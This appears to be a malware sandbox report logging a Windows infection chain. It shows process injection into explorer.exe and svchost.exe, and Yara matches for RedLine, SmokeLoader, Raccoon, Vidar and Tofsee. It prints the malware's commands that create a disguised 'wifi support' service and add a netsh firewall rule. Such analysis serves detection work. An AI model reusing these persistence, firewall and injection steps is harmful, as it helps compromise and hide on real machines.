                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeMemory written: C:\Users\user\AppData\Local\Temp\3D34.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E70000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeThread created: C:\Windows\explorer.exe EIP: 44C1930
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaThread created: unknown EIP: 4F11930
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E70000
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DC5008
                      .NET source code references suspicious native API functionsShow sources
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 3D34.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.3D34.exe.ec0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.2.3D34.exe.ec0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.3D34.exe.ec0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.3D34.exe.ec0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.0.3D34.exe.150000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.0.3D34.exe.150000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.2.3D34.exe.150000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.2.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.0.3D34.exe.150000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.0.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.0.3D34.exe.150000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.0.3D34.exe.150000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start qeprvgom
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000005.00000000.707515512.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.690989034.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.679013555.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000005.00000000.698669276.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000005.00000000.684563899.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700236114.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.715039633.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3D34.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00419D72 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00419D72 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Uses netsh to modify the Windows network and firewall settingsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Modifies the windows firewallShow sources
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 18.2.3D34.exe.430f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.444ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.444ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.430f910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000026.00000000.825922987.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.893709342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.825398173.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.893284342.0000000003702000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.826478110.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.827053471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 1.1.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.jgdhbua.6f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.1.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ECD2MpEBSf.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.899701090.0000000002070000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.901276330.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 17.3.D936.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.krmdinzg.exe.7c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D936.exe PID: 7124, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: krmdinzg.exe PID: 6888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 18.2.3D34.exe.430f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.444ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.444ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.430f910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000026.00000000.825922987.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.893709342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.825398173.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.893284342.0000000003702000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.826478110.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.827053471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 1.1.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.jgdhbua.6f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.1.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ECD2MpEBSf.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
